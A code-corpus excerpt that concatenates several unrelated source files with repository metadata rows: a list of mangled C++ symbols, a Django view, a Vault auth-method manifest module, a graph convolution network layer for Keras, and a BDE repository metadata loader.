2264: b'?InsertEntry@ListBox@@QAEEABVString@@G@Z',
2265: b'?IsEntryPosSelected@ListBox@@QBEEG@Z',
2266: b'?IsEntrySelected@ListBox@@QBEEABVString@@@Z',
2267: b'?IsTravelSelect@ListBox@@QBEEXZ',
2268: b'?RemoveEntry@ListBox@@QAEXABVString@@@Z',
2269: b'?RemoveEntry@ListBox@@QAEXG@Z',
2270: b'?Select@ListBox@@UAEXXZ',
2271: b'?SelectEntry@ListBox@@QAEXABVString@@E@Z',
2272: b'?SelectEntryPos@ListBox@@QAEXGE@Z',
2273: b'?SetNoSelection@ListBox@@QAEXXZ',
2274: b'??0FixedBitmap@@QAE@PAVWindow@@ABVResId@@@Z',
2275: b'??0FixedBitmap@@QAE@PAVWindow@@G@Z',
2276: b'??0FixedIcon@@QAE@PAVWindow@@ABVResId@@@Z',
2277: b'??0FixedIcon@@QAE@PAVWindow@@G@Z',
2278: b'??0FixedText@@QAE@PAVWindow@@ABVResId@@@Z',
2279: b'??0FixedText@@QAE@PAVWindow@@G@Z',
2280: b'??1FixedBitmap@@UAE@XZ',
2281: b'??1FixedIcon@@UAE@XZ',
2282: b'??1FixedText@@UAE@XZ',
2283: b'??_7FixedBitmap@@6B@',
2284: b'??_7FixedIcon@@6B@',
2285: b'??_7FixedText@@6B@',
2286: b'??_GFixedBitmap@@UAEPAXI@Z',
2287: b'??_GFixedIcon@@UAEPAXI@Z',
2288: b'??_GFixedText@@UAEPAXI@Z',
2289: b'?ChangeBitmap@FixedBitmap@@QAE?AVBitmap@@ABV2@@Z',
2290: b'?ChangeIcon@FixedIcon@@QAE?AVIcon@@ABV2@@Z',
2291: b'?Paint@FixedBitmap@@UAEXABVRectangle@@@Z',
2292: b'?Paint@FixedIcon@@UAEXABVRectangle@@@Z',
2293: b'?Resize@FixedBitmap@@UAEXXZ',
2294: b'?Resize@FixedIcon@@UAEXXZ',
2295: b'??0GroupBox@@QAE@PAVWindow@@@Z',
2296: b'??0GroupBox@@QAE@PAVWindow@@ABVResId@@@Z',
2297: b'??1GroupBox@@UAE@XZ',
2298: b'??_7GroupBox@@6B@',
2299: b'??_GGroupBox@@UAEPAXI@Z',
2300: b'??0Range@@QAE@ABV0@@Z',
2301: b'??0Range@@QAE@FF@Z',
2302: b'??0Range@@QAE@XZ',
2303: b'??0ScrollBar@@QAE@PAVWindow@@ABVResId@@@Z',
2304: b'??0ScrollBar@@QAE@PAVWindow@@G@Z',
2305: b'??1ScrollBar@@UAE@XZ',
2306: b'??4Range@@QAEAAV0@ABV0@@Z',
2307: b'??_7ScrollBar@@6B@',
2308: b'??_GScrollBar@@UAEPAXI@Z',
2309: b'?ChangeLineSize@ScrollBar@@QAEFF@Z',
2310: b'?ChangePageSize@ScrollBar@@QAEFF@Z',
2311: b'?ChangeRange@ScrollBar@@QAE?AVRange@@ABV2@@Z',
2312: b'?ChangeThumbPos@ScrollBar@@QAEFF@Z',
2313: b'?ChangeVisibleSize@ScrollBar@@QAEGG@Z',
2314: b'?EndScroll@ScrollBar@@UAEXXZ',
2315: b'?GetDelta@ScrollBar@@QBEFXZ',
2316: b'?GetLineSize@ScrollBar@@QBEFXZ',
2317: b'?GetPageSize@ScrollBar@@QBEFXZ',
2318: b'?GetRange@ScrollBar@@QBE?AVRange@@XZ',
2319: b'?GetThumbPos@ScrollBar@@QBEFXZ',
2320: b'?GetType@ScrollBar@@QBE?AW4ScrollType@@XZ',
2321: b'?GetVisibleSize@ScrollBar@@QBEGXZ',
2322: b'?Scroll@ScrollBar@@UAEXXZ',
2323: b'??0Clipboard@@QAE@XZ',
2324: b'??0Exchange@@QAE@XZ',
2325: b'??0ExchangeFormat@@QAE@ABVString@@KI0@Z',
2326: b'??1Clipboard@@QAE@XZ',
2327: b'??1Exchange@@QAE@XZ',
2328: b'??1ExchangeFormat@@QAE@XZ',
2329: b'??_7Clipboard@@6B@',
2330: b'??_7Exchange@@6B@',
2331: b'??_GExchangeFormat@@QAEPAXI@Z',
2332: b'?Clear@Clipboard@@SGXXZ',
2333: b'?Cleared@Clipboard@@UAEXXZ',
2334: b'?CopyBitmap@Clipboard@@SGEABVBitmap@@@Z',
2335: b'?CopyData@Clipboard@@SGEPBXKKG@Z',
2336: b'?CopyGDIMetaFile@Clipboard@@SGEABVGDIMetaFile@@@Z',
2337: b'?CopyPrivateData@Clipboard@@SGEPAX@Z',
2338: b'?CopyRequest@Clipboard@@SGEK@Z',
2339: b'?CopyString@Clipboard@@SGEABVString@@@Z',
2340: b'?GetDataLen@Clipboard@@SGKK@Z',
2341: b'?GetFormat@Clipboard@@SGKG@Z',
2342: b'?GetFormatCount@Clipboard@@SGGXZ',
2343: b'?GetFormatName@Exchange@@SG?AVString@@K@Z',
2344: b'?GetRequestFormat@Clipboard@@SGKXZ',
2345: b'?HasFormat@Clipboard@@SGEK@Z',
2346: b'?PasteBitmap@Clipboard@@SG?AVBitmap@@XZ',
2347: b'?PasteData@Clipboard@@SGEPAXKK@Z',
2348: b'?PasteGDIMetaFile@Clipboard@@SGEAAVGDIMetaFile@@@Z',
2349: b'?PastePrivateData@Clipboard@@SGPAXXZ',
2350: b'?PasteString@Clipboard@@SG?AVString@@XZ',
2351: b'?RegisterFormatName@Exchange@@SGKABVString@@@Z',
2352: b'?Request@Exchange@@UAEXXZ',
2353: b'??0DataObject@@QAE@EE@Z',
2354: b'??0DropSource@@QAE@XZ',
2355: b'??0DropTarget@@QAE@PAVWindow@@@Z',
2356: b'??0StarObjectMgr@@QAE@XZ',
2357: b'??0TransferFormatList@@QAE@GG@Z',
2358: b'??1DataObject@@QAE@XZ',
2359: b'??1DropSource@@QAE@XZ',
2360: b'??1DropTarget@@UAE@XZ',
2361: b'??1StarObjectMgr@@QAE@XZ',
2362: b'??8TransferFormat@@QBEEABV0@@Z',
2363: b'??_7DataObject@@6B@',
2364: b'??_7DropSource@@6B@',
2365: b'??_7DropTarget@@6B@',
2366: b'??_GDropTarget@@UAEPAXI@Z',
2367: b'?AppendFormat@DataObject@@QAEXABVTransferFormat@@@Z',
2368: b'?Clear@DataObject@@UAEXXZ',
2369: b'?ClearFormatList@DataObject@@AAEXXZ',
2370: b'?Count@TransferFormatList@@QBEKXZ',
2371: b'?CreateData@DataObject@@UAEPAVTransferData@@ABVTransferFormat@@@Z',
2372: b'?DragEnter@DropTarget@@UAEEW4DropAction@@ABVPoint@@@Z',
2373: b'?DragLeave@DropTarget@@UAEXXZ',
2374: b'?DragOver@DropTarget@@UAEEW4DropAction@@ABVPoint@@@Z',
2375: b'?Drop@DropTarget@@UAEEW4DropAction@@ABVPoint@@@Z',
2376: b'?Execute@DropSource@@QAE?AW4DropAction@@EEE@Z',
2377: b'?FormatCount@DataObject@@QBEKXZ',
2378: b'?GetFormat@DataObject@@QBEPBVTransferFormat@@K@Z',
2379: b'?GetObject@TransferFormatList@@QBEPAVTransferFormat@@K@Z',
2380: b'?GiveFeedback@DropSource@@UAEEW4DropAction@@@Z',
2381: b'?HasFormat@DataObject@@QBEEABVTransferFormat@@@Z',
2382: b'?Insert@TransferFormatList@@QAEXPAVTransferFormat@@K@Z',
2383: b'?IsFormatList@DataObject@@QBEEXZ',
2384: b'?OnNewData@DataObject@@UAEXXZ',
2385: b'?RegisterWindow@DropTarget@@QAEXPAVWindow@@@Z',
2386: b'?GetSVGDIMetaFile@@YG?AVGDIMetaFile@@PAXE@Z',
2387: b'??0DragServer@@QAE@XZ',
2388: b'??0MySource@@QAE@PAVWindow@@ABVPointer@@11@Z',
2389: b'??0TransferData@@QAE@ABVTransferFormat@@@Z',
2390: b'??0WinTransferData@@QAE@ABVTransferFormat@@PAX@Z',
2391: b'??1DragServer@@QAE@XZ',
2392: b'??1MySource@@QAE@XZ',
2393: b'??1TransferData@@UAE@XZ',
2394: b'??1WinTransferData@@UAE@XZ',
2395: b'??_7DragServer@@6B@',
2396: b'??_7MySource@@6B@',
2397: b'??_7TransferData@@6B@',
2398: b'??_7WinTransferData@@6B@',
2399: b'??_GBitmap@@QAEPAXI@Z',
2400: b'??_GTransferData@@UAEPAXI@Z',
2401: b'??_GWinTransferData@@UAEPAXI@Z',
2402: b'?Clear@DragServer@@SGXXZ',
2403: b'?CopyBitmap@DragServer@@SGEABVBitmap@@@Z',
2404: b'?CopyData@DragServer@@SGEPBXKKG@Z',
2405: b'?CopyFileA@DragServer@@SGEABVString@@@Z',
2406: b'?CopyGDIMetaFile@DragServer@@SGEABVGDIMetaFile@@@Z',
2407: b'?CopyPrivateData@DragServer@@SGEPAX@Z',
2408: b'?CopyRequest@DragServer@@SGEK@Z',
2409: b'?CopyString@DragServer@@SGEABVString@@@Z',
2410: b'?CreateData@MySource@@UAEPAVTransferData@@ABVTransferFormat@@@Z',
2411: b'?ExecuteDrag@Window@@QAE?AW4DropAction@@ABVPointer@@0GPBVRegion@@@Z',
2412: b'?Get@WinTransferData@@UBEQAXXZ',
2413: b'?GetDataLen@DragServer@@SGKGK@Z',
2414: b'?GetFormat@DragServer@@SGKGG@Z',
2415: b'?GetFormatCount@DragServer@@SGGG@Z',
2416: b'?GetItemCount@DragServer@@SGGXZ',
2417: b'?GetOwnership@WinTransferData@@UAEPAXXZ',
2418: b'?GetRequestFormat@DragServer@@SGKXZ',
2419: b'?GetRequestItem@DragServer@@SGGXZ',
2420: b'?GetTargetPrinterName@DragServer@@SG?AVString@@XZ',
2421: b'?GiveFeedback@MySource@@UAEEW4DropAction@@@Z',
2422: b'?HasFormat@DragServer@@SGEGK@Z',
2423: b'?IsRequestName@DragServer@@SGEXZ',
2424: b'?Last@List@@QAEPAXXZ',
2425: b'?NewItem@DragServer@@SGXXZ',
2426: b'?PasteBitmap@DragServer@@SG?AVBitmap@@G@Z',
2427: b'?PasteData@DragServer@@SGEGPAXKK@Z',
2428: b'?PasteFile@DragServer@@SG?AVString@@G@Z',
2429: b'?PasteGDIMetaFile@DragServer@@SGEGAAVGDIMetaFile@@@Z',
2430: b'?PastePrivateData@DragServer@@SGPAXG@Z',
2431: b'?PasteString@DragServer@@SG?AVString@@G@Z',
2432: b'?SetPointers@MySource@@QAEXPAVWindow@@ABVPointer@@11@Z',
}
| 45.995866
| 83
| 0.651442
|
563582b15d77da5eb881db3a8f1e008b1e1bff8f
| 120
|
py
|
Python
|
pae/book_edit_bootstrap/django/test/testapp/views.py
|
wasit7/book_pae
|
c53cca3342593a2769f398db9bf969515d3de117
|
[
"MIT"
] | null | null | null |
pae/book_edit_bootstrap/django/test/testapp/views.py
|
wasit7/book_pae
|
c53cca3342593a2769f398db9bf969515d3de117
|
[
"MIT"
] | null | null | null |
pae/book_edit_bootstrap/django/test/testapp/views.py
|
wasit7/book_pae
|
c53cca3342593a2769f398db9bf969515d3de117
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
def homep(request):
return render(request, 'homep.html')
| 24
| 37
| 0.775
|
57edcceceada6f3fd64ff2a1d6a153815c8ff332
| 1,461
|
py
|
Python
|
vaultup/manifests/auth_method.py
|
momothereal/vaultup
|
cab1718f8835ce5d35b8352d32bf2a5528257e39
|
[
"Apache-2.0"
] | null | null | null |
vaultup/manifests/auth_method.py
|
momothereal/vaultup
|
cab1718f8835ce5d35b8352d32bf2a5528257e39
|
[
"Apache-2.0"
] | 4
|
2019-10-03T22:36:56.000Z
|
2019-10-09T16:12:26.000Z
|
vaultup/manifests/auth_method.py
|
momothereal/vaultup
|
cab1718f8835ce5d35b8352d32bf2a5528257e39
|
[
"Apache-2.0"
] | null | null | null |
from typing import Dict, Optional
import hvac
from vaultup.manifests import ManifestItem
class LdapAuthConfigManifest(ManifestItem):
def __init__(self, client: hvac.Client, name: str, data: Dict):
super().__init__(data)
def convert(self) -> Optional[Dict]:
return self.data
AUTH_TYPES = {
"ldap": LdapAuthConfigManifest
}
class AuthMethodManifest(ManifestItem):
"""
Manifest entry for an auth method.
"""
def __init__(self, client: hvac.Client, name: str, data: Dict):
super().__init__(data)
auth_type = data["type"]
if auth_type in client.auth.implemented_class_names and auth_type in AUTH_TYPES:
auth_conf = client.auth.__getattr__(auth_type).read_configuration(mount_point=name)["data"]
self._auth_config = AUTH_TYPES[auth_type](client, name, auth_conf).convert()
else:
self._auth_config = None
def convert(self) -> Optional[Dict]:
config = self.data.get("config", {})
# add type-specific entries to config
if self._auth_config:
config[self.data["type"]] = self._auth_config
return {
"type": self.data["type"],
"description": self.data.get("description"),
"config": self.data.get("config"),
"local": self.data.get("local"),
"options": self.data.get("options"),
"seal_wrap": self.data.get("seal_wrap"),
}
| 28.647059
| 103
| 0.62423
|
1293e34cc58e9a42ae65bd5a9cb06b6214ddb407
| 15,963
|
py
|
Python
|
ktrain/graph/stellargraph/layer/gcn.py
|
happy-machine/ktrain
|
221e7ce91f8cfdc280fc733083e901fcedb9f7e5
|
[
"MIT"
] | null | null | null |
ktrain/graph/stellargraph/layer/gcn.py
|
happy-machine/ktrain
|
221e7ce91f8cfdc280fc733083e901fcedb9f7e5
|
[
"MIT"
] | null | null | null |
ktrain/graph/stellargraph/layer/gcn.py
|
happy-machine/ktrain
|
221e7ce91f8cfdc280fc733083e901fcedb9f7e5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2018-2019 Data61, CSIRO
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ....imports import *
from ..mapper import FullBatchNodeGenerator
from .misc import SqueezedSparseConversion
class GraphConvolution(Layer):
"""
Graph Convolution (GCN) Keras layer.
The implementation is based on the keras-gcn github repo https://github.com/tkipf/keras-gcn.
Original paper: Semi-Supervised Classification with Graph Convolutional Networks. Thomas N. Kipf, Max Welling,
International Conference on Learning Representations (ICLR), 2017 https://github.com/tkipf/gcn
Notes:
- The inputs are tensors with a batch dimension of 1:
Keras requires this batch dimension, and for full-batch methods
we only have a single "batch".
- There are three inputs required, the node features, the output
indices (the nodes that are to be selected in the final layer)
and the normalized graph Laplacian matrix
- This class assumes that the normalized Laplacian matrix is passed as
input to the Keras methods.
- The output indices are used when ``final_layer=True`` and the returned outputs
are the final-layer features for the nodes indexed by output indices.
- If ``final_layer=False`` all the node features are output in the same ordering as
given by the adjacency matrix.
Args:
units (int): dimensionality of output feature vectors
activation (str): nonlinear activation applied to layer's output to obtain output features
use_bias (bool): toggles an optional bias
final_layer (bool): If False the layer returns output for all nodes,
if True it returns the subset specified by the indices passed to it.
kernel_initializer (str): name of layer bias f the initializer for kernel parameters (weights)
bias_initializer (str): name of the initializer for bias
attn_kernel_initializer (str): name of the initializer for attention kernel
kernel_regularizer (str): name of regularizer to be applied to layer kernel. Must be a Keras regularizer.
bias_regularizer (str): name of regularizer to be applied to layer bias. Must be a Keras regularizer.
activity_regularizer (str): not used in the current implementation
kernel_constraint (str): constraint applied to layer's kernel
bias_constraint (str): constraint applied to layer's bias
"""
def __init__(
self,
units,
activation=None,
use_bias=True,
final_layer=False,
kernel_initializer="glorot_uniform",
bias_initializer="zeros",
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs,
):
if "input_shape" not in kwargs and "input_dim" in kwargs:
kwargs["input_shape"] = (kwargs.get("input_dim"),)
super().__init__(**kwargs)
self.units = units
self.activation = activations.get(activation)
self.use_bias = use_bias
self.kernel_initializer = initializers.get(kernel_initializer)
self.bias_initializer = initializers.get(bias_initializer)
self.kernel_regularizer = regularizers.get(kernel_regularizer)
self.bias_regularizer = regularizers.get(bias_regularizer)
self.activity_regularizer = regularizers.get(activity_regularizer)
self.kernel_constraint = constraints.get(kernel_constraint)
self.bias_constraint = constraints.get(bias_constraint)
self.final_layer = final_layer
def get_config(self):
"""
Gets class configuration for Keras serialization.
Used by keras model serialization.
Returns:
A dictionary that contains the config of the layer
"""
config = {
"units": self.units,
"use_bias": self.use_bias,
"final_layer": self.final_layer,
"activation": activations.serialize(self.activation),
"kernel_initializer": initializers.serialize(self.kernel_initializer),
"bias_initializer": initializers.serialize(self.bias_initializer),
"kernel_regularizer": regularizers.serialize(self.kernel_regularizer),
"bias_regularizer": regularizers.serialize(self.bias_regularizer),
"activity_regularizer": regularizers.serialize(self.activity_regularizer),
"kernel_constraint": constraints.serialize(self.kernel_constraint),
"bias_constraint": constraints.serialize(self.bias_constraint),
}
base_config = super().get_config()
return {**base_config, **config}
def compute_output_shape(self, input_shapes):
"""
Computes the output shape of the layer.
Assumes the following inputs:
Args:
input_shape (tuple of ints)
Shape tuples can include None for free dimensions, instead of an integer.
Returns:
An input shape tuple.
"""
feature_shape, out_shape, *As_shapes = input_shapes
batch_dim = feature_shape[0]
if self.final_layer:
out_dim = out_shape[1]
else:
out_dim = feature_shape[1]
return (batch_dim, out_dim, self.units)
def build(self, input_shapes):
"""
Builds the layer
Args:
input_shape (list of int): shapes of the layer's inputs (node features and adjacency matrix)
"""
feat_shape = input_shapes[0]
input_dim = feat_shape[-1]
self.kernel = self.add_weight(
shape=(input_dim, self.units),
initializer=self.kernel_initializer,
name="kernel",
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
)
if self.use_bias:
self.bias = self.add_weight(
shape=(self.units,),
initializer=self.bias_initializer,
name="bias",
regularizer=self.bias_regularizer,
constraint=self.bias_constraint,
)
else:
self.bias = None
self.built = True
def call(self, inputs):
"""
Applies the layer.
Args:
inputs (list): a list of 3 input tensors that includes
node features (size 1 x N x F),
output indices (size 1 x M)
graph adjacency matrix (size N x N),
where N is the number of nodes in the graph, and
F is the dimensionality of node features.
Returns:
Keras Tensor that represents the output of the layer.
"""
features, out_indices, *As = inputs
batch_dim, n_nodes, _ = K.int_shape(features)
if batch_dim != 1:
raise ValueError(
"Currently full-batch methods only support a batch dimension of one"
)
# Remove singleton batch dimension
features = K.squeeze(features, 0)
out_indices = K.squeeze(out_indices, 0)
# Calculate the layer operation of GCN
A = As[0]
h_graph = K.dot(A, features)
output = K.dot(h_graph, self.kernel)
# Add optional bias & apply activation
if self.bias:
output += self.bias
output = self.activation(output)
# On the final layer we gather the nodes referenced by the indices
if self.final_layer:
output = K.gather(output, out_indices)
# Add batch dimension back if we removed it
# print("BATCH DIM:", batch_dim)
if batch_dim == 1:
output = K.expand_dims(output, 0)
return output
class GCN:
"""
A stack of Graph Convolutional layers that implement a graph convolution network model
as in https://arxiv.org/abs/1609.02907
The model minimally requires specification of the layer sizes as a list of ints
corresponding to the feature dimensions for each hidden layer,
activation functions for each hidden layers, and a generator object.
To use this class as a Keras model, the features and pre-processed adjacency matrix
should be supplied using the :class:`FullBatchNodeGenerator` class. To have the appropriate
pre-processing the generator object should be instantiated as follows::
generator = FullBatchNodeGenerator(G, method="gcn")
Note that currently the GCN class is compatible with both sparse and dense adjacency
matrices and the :class:`FullBatchNodeGenerator` will default to sparse.
For more details, please see the GCN demo notebook:
demos/node-classification/gat/gcn-cora-node-classification-example.ipynb
Notes:
- The inputs are tensors with a batch dimension of 1. These are provided by the \
:class:`FullBatchNodeGenerator` object.
- This assumes that the normalized Lapalacian matrix is provided as input to
Keras methods. When using the :class:`FullBatchNodeGenerator` specify the
``method='gcn'`` argument to do this pre-processing.
- The nodes provided to the :class:`FullBatchNodeGenerator.flow` method are
used by the final layer to select the predictions for those nodes in order.
However, the intermediate layers before the final layer order the nodes
in the same way as the adjacency matrix.
Examples:
Creating a GCN node classification model from an existing :class:`StellarGraph`
object ``G``::
generator = FullBatchNodeGenerator(G, method="gcn")
gcn = GCN(
layer_sizes=[32, 4],
activations=["elu","softmax"],
generator=generator,
dropout=0.5
)
x_inp, predictions = gcn.node_model()
Args:
layer_sizes (list of int): list of output sizes of GCN layers in the stack
activations (list of str): list of activations applied to each layer's output
generator (FullBatchNodeGenerator): an instance of FullBatchNodeGenerator class constructed on the graph of interest
bias (bool): toggles an optional bias in GCN layers
dropout (float): dropout rate applied to input features of each GCN layer
kernel_regularizer (str): normalization applied to the kernels of GCN layers
"""
def __init__(
self,
layer_sizes,
activations,
generator,
bias=True,
dropout=0.0,
kernel_regularizer=None,
):
if not isinstance(generator, FullBatchNodeGenerator):
raise TypeError("Generator should be a instance of FullBatchNodeGenerator")
assert len(layer_sizes) == len(activations)
self.layer_sizes = layer_sizes
self.activations = activations
self.bias = bias
self.dropout = dropout
self.kernel_regularizer = kernel_regularizer
self.generator = generator
self.support = 1
self.method = generator.method
# Check if the generator is producing a sparse matrix
self.use_sparse = generator.use_sparse
# Initialize a stack of GCN layers
n_layers = len(self.layer_sizes)
self._layers = []
for ii in range(n_layers):
l = self.layer_sizes[ii]
a = self.activations[ii]
self._layers.append(Dropout(self.dropout))
self._layers.append(
GraphConvolution(
l,
activation=a,
use_bias=self.bias,
kernel_regularizer=self.kernel_regularizer,
final_layer=ii == (n_layers - 1),
)
)
def __call__(self, x):
"""
Apply a stack of GCN layers to the inputs.
The input tensors are expected to be a list of the following:
[
Node features shape (1, N, F),
Adjacency indices (1, E, 2),
Adjacency values (1, E),
Output indices (1, O)
]
where N is the number of nodes, F the number of input features,
E is the number of edges, O the number of output nodes.
Args:
x (Tensor): input tensors
Returns:
Output tensor
"""
x_in, out_indices, *As = x
# Currently we require the batch dimension to be one for full-batch methods
batch_dim, n_nodes, _ = K.int_shape(x_in)
if batch_dim != 1:
raise ValueError(
"Currently full-batch methods only support a batch dimension of one"
)
# Convert input indices & values to a sparse matrix
if self.use_sparse:
A_indices, A_values = As
Ainput = [
SqueezedSparseConversion(shape=(n_nodes, n_nodes))(
[A_indices, A_values]
)
]
# Otherwise, create dense matrix from input tensor
else:
Ainput = [Lambda(lambda A: K.squeeze(A, 0))(A) for A in As]
# TODO: Support multiple matrices?
if len(Ainput) != 1:
raise NotImplementedError(
"The GCN method currently only accepts a single matrix"
)
h_layer = x_in
for layer in self._layers:
if isinstance(layer, GraphConvolution):
# For a GCN layer add the matrix and output indices
# Note that the output indices are only used if `final_layer=True`
h_layer = layer([h_layer, out_indices] + Ainput)
else:
# For other (non-graph) layers only supply the input tensor
h_layer = layer(h_layer)
# print("Hlayer:", h_layer)
return h_layer
def node_model(self):
"""
Builds a GCN model for node prediction
Returns:
tuple: `(x_inp, x_out)`, where `x_inp` is a list of two Keras input tensors for the GCN model (containing node features and graph laplacian),
and `x_out` is a Keras tensor for the GCN model output.
"""
# Placeholder for node features
N_nodes = self.generator.features.shape[0]
N_feat = self.generator.features.shape[1]
# Inputs for features & target indices
x_t = Input(batch_shape=(1, N_nodes, N_feat))
out_indices_t = Input(batch_shape=(1, None), dtype="int32")
# Create inputs for sparse or dense matrices
if self.use_sparse:
# Placeholders for the sparse adjacency matrix
A_indices_t = Input(batch_shape=(1, None, 2), dtype="int64")
A_values_t = Input(batch_shape=(1, None))
A_placeholders = [A_indices_t, A_values_t]
else:
# Placeholders for the dense adjacency matrix
A_m = Input(batch_shape=(1, N_nodes, N_nodes))
A_placeholders = [A_m]
# TODO: Support multiple matrices
x_inp = [x_t, out_indices_t] + A_placeholders
x_out = self(x_inp)
# Flatten output by removing singleton batch dimension
if x_out.shape[0] == 1:
self.x_out_flat = Lambda(lambda x: K.squeeze(x, 0))(x_out)
else:
self.x_out_flat = x_out
return x_inp, x_out
| 37.56
| 153
| 0.628579
|
cddc2ce7e577c6022b47652dc49aa070f8a41897
| 12,539
|
py
|
Python
|
lib/python/bdebuild/meta/repoloadutil.py
|
apaprocki/bde-tools
|
74cee6ed6c2de1bbb0d7cb7fdc96b60a37cab434
|
[
"Apache-2.0"
] | null | null | null |
lib/python/bdebuild/meta/repoloadutil.py
|
apaprocki/bde-tools
|
74cee6ed6c2de1bbb0d7cb7fdc96b60a37cab434
|
[
"Apache-2.0"
] | null | null | null |
lib/python/bdebuild/meta/repoloadutil.py
|
apaprocki/bde-tools
|
74cee6ed6c2de1bbb0d7cb7fdc96b60a37cab434
|
[
"Apache-2.0"
] | null | null | null |
"""Utilities to load parts of a repository.
"""
import glob
import os
import re
from bdebuild.common import blderror
from bdebuild.common import sysutil
from bdebuild.meta import repounits
from bdebuild.meta import optionsparser
def load_package_group(path):
"""Load a package group.
Args:
path (str): Path to the root of the package group.
Returns:
PackageGroup
"""
package_group = repounits.PackageGroup(path)
package_group.mem = set(_load_lsv(
os.path.join(package_group.path, 'group',
package_group.name + '.mem')))
package_group.dep = set(_load_lsv(
os.path.join(package_group.path, 'group',
package_group.name + '.dep')))
package_group.opts = _load_opts(os.path.join(package_group.path, 'group',
package_group.name + '.opts'))
package_group.defs = _load_opts(os.path.join(package_group.path, 'group',
package_group.name + '.defs'))
package_group.cap = _load_opts(os.path.join(package_group.path, 'group',
package_group.name + '.cap'))
return package_group
def load_package(path, package_type):
"""Load a package.
Args:
path (str): Path to the root of the package.
type_ (PackageType): The package type.
Returns:
A type derived from PackageBase
"""
package = repounits.Package(path, package_type)
package.mem = set(_load_lsv(
os.path.join(package.path, 'package',
package.name + '.mem')))
package.dep = set(_load_lsv(
os.path.join(package.path, 'package',
package.name + '.dep')))
package.opts = _load_opts(os.path.join(package.path, 'package',
package.name + '.opts'))
package.defs = _load_opts(os.path.join(package.path, 'package',
package.name + '.defs'))
package.cap = _load_opts(os.path.join(package.path, 'package',
package.name + '.cap'))
dums_path = os.path.join(package.path, 'package', package.name + '.dums')
package.has_dums = os.path.isfile(dums_path)
# We need to distinguish between the case when the pub file does not exist
# and the case when the pub file exist but is empty. If the pub file does
# not exist, then every header file should be exported; if the pub file
# does exist but is empty, then no header file should be exported.
pub_path = os.path.join(package.path, 'package', package.name + '.pub')
if os.path.isfile(pub_path):
package.pub = set(_load_lsv(pub_path))
else:
package.pub = None
if package.type_ == repounits.PackageType.PACKAGE_PLUS:
package.pt_extras = _load_plus_package_extras(package)
else:
if package.type_ == repounits.PackageType.PACKAGE_APPLICATION:
main_ext = '.m.cpp'
valid_prefixes = [package.name]
if package.name.startswith('m_'):
valid_prefixes.append(package.name[2:])
for prefix in valid_prefixes:
main_path = os.path.join(package.path, prefix + main_ext)
if os.path.isfile(main_path):
package.app_main = prefix
break
if not package.app_main:
raise blderror.MissingFileError(
'Missing source file "%s" for '
'application package "%s"' %
(os.path.join(package.path, package.name + main_ext),
package.name))
for component_name in sorted(package.mem):
component = load_component(component_name, package.path)
package.components.append(component)
return package
def _load_plus_package_extras(package):
"""Load metadata of a "+" package.
Args:
package (Package): The plus package.
Returns:
PlusPackageExtras
"""
def rps(l):
return set([os.path.relpath(path, package.path) for path in l])
extras = repounits.PlusPackageExtras()
if package.pub is None: # pub file does not exist
headers = glob.glob(os.path.join(package.path, '*.h'))
headers.extend(glob.glob(os.path.join(package.path, '*.SUNWCCh')))
headers.extend(glob.glob(os.path.join(package.path, '*/*.h')))
headers.extend(glob.glob(os.path.join(package.path, '*/*.SUNWCCh')))
elif len(package.pub) > 0:
extras.headers = package.pub
else: # pub file is empty
extras.headers = []
extras.cpp_sources = rps(glob.glob(os.path.join(package.path, '*.cpp')))
extras.cpp_tests = rps(glob.glob(os.path.join(package.path,
'test', '*.cpp')))
extras.c_tests = rps(glob.glob(os.path.join(package.path, 'test', '*.c')))
return extras
def load_component(name, package_path):
"""Load a component.
Args:
name (str): The name of the component.
package_path (str): The path to the package containing the component.
Returns:
None
"""
component = repounits.Component(name)
base_path = os.path.join(package_path, component.name)
header_path = base_path + '.h'
cxx_path = base_path + '.cpp'
c_path = base_path + '.c'
if not os.path.isfile(header_path):
raise blderror.MissingFileError(
'Missing header file "%s"' % header_path)
if os.path.isfile(cxx_path):
component.type_ = repounits.ComponentType.CXX
test_path = base_path + '.t.cpp'
elif os.path.isfile(c_path):
component.type_ = repounits.ComponentType.C
test_path = base_path + '.t.c'
else:
raise blderror.MissingFileError(
'Missing source (cpp) file for header file "%s"' % header_path)
component.has_test_driver = os.path.isfile(test_path)
return component
def is_package_group_path(path):
"""Determine whether a path is the root of a package group.
"""
group_name = os.path.basename(path)
return os.path.isfile(os.path.join(path, 'group', group_name + '.mem'))
def is_package_path(path):
"""Determine whether a path is the root of a package.
"""
package_name = os.path.basename(path)
return os.path.isfile(os.path.join(path, 'package', package_name + '.mem'))
def is_third_party_path(path):
"""Determine whether a path is the root of a third party directory.
"""
return os.path.isfile(os.path.join(path, 'wscript'))
def is_bde_repo_path(path):
"""Determine whether a path is the root of a BDE-style repo.
"""
basename = os.path.basename(path)
return not basename.startswith('_') and basename not in ('build')
def _load_opts(path):
"""Load option rules from a file.
"""
if os.path.isfile(path):
return optionsparser.parse_option_rules_file(path)
else:
return []
REMOVE_COMMENT_RE = re.compile(r'^([^#]*)(#.*)?$')
def _load_lsv(path):
"""Load values from line separated file.
Return a list containing the contents of the line separated file from the
specified path. If the path does not exist, return an empty list.
"""
try:
with open(path) as f:
lines = f.readlines()
except IOError:
return []
entries = []
for line in lines:
line = line.rstrip('\n')
# Lines after "#LEGACY" are ignored and used for compatibility with
# other internal legacy tools.
if line == '#LEGACY':
break
entries.extend(REMOVE_COMMENT_RE.match(line).group(1).split())
return entries
def get_uor_doc(uor):
"""Parse the mnemonic and description of a UOR from its doc file.
Args:
uor (Package or PackageGroup): The unit of release.
Returns:
UorDoc
"""
name = uor.name
doc_path = os.path.join(uor.path, 'doc', name + '.txt')
try:
with open(doc_path) as f:
purpose = None
mnemonic = None
for line in f:
if line.startswith('@PURPOSE'):
purpose = line.split(':')[1].strip()
elif line.startswith('@MNEMONIC'):
mnemonic = line.split(':')[1].strip()
if purpose and mnemonic:
return repounits.UorDoc(mnemonic, purpose)
except:
pass
